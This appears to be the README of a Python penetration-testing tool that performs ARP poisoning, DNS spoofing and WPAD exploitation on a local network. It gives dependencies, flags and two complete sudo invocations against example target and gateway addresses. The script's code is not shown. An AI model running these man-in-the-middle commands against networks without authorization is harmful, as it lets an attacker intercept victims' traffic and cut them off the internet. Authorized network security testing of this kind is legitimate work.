- Currently does not forward traffic which disconnects the attacked host from internet.
- Packets will be restored when the attack is stopped.
This script performs ARP poisoning, DNS spoofing, and WPAD exploitation. It is designed for network penetration testing and security analysis.
- ARP Poisoning: Redirect network traffic by spoofing ARP messages.
- DNS Spoofing: Intercept and modify DNS queries to redirect traffic.
- WPAD Exploitation: Serve a malicious WPAD file to configure a proxy server for the victim.
- Python 3.x
- Scapy
- Impacket
- Colorama
- Install required Python packages:
pip install scapy impacket colorama
python arp.py -i <interface> --target-ip <target_ip> [options]-i, --interface: Network interface to use (required)--target-ip: Target IP address (required)--target-mac: Target MAC address (optional, will be resolved if not provided)--gateway-ip: Gateway IP address (optional, will be resolved if not provided)--gateway-mac: Gateway MAC address (optional, will be resolved if not provided)--attacker-ip: Attacker's IP address (optional, will be resolved if not provided)--proxy-port: Port for the proxy server (optional)--domain: Domain to spoof (optional, e.g., domain.local)
# Auto
sudo python3 arp.py -i eth0 --target-ip 192.168.1.100 --proxy-port 8080 --domain example.com
# Manual (most trustable method)
sudo python3 arp.py --target-ip 192.168.100.183 --target-mac 52:54:00:9f:47:11 --gateway-ip 192.168.100.153 --gateway-mac 52:54:00:b0:a1:55 --attacker-ip 192.168.100.131 --domain wintastic.local -i eth0
By following the instructions above, you can utilize this script for network security testing and analysis. Ensure you have permission to test the network you are targeting.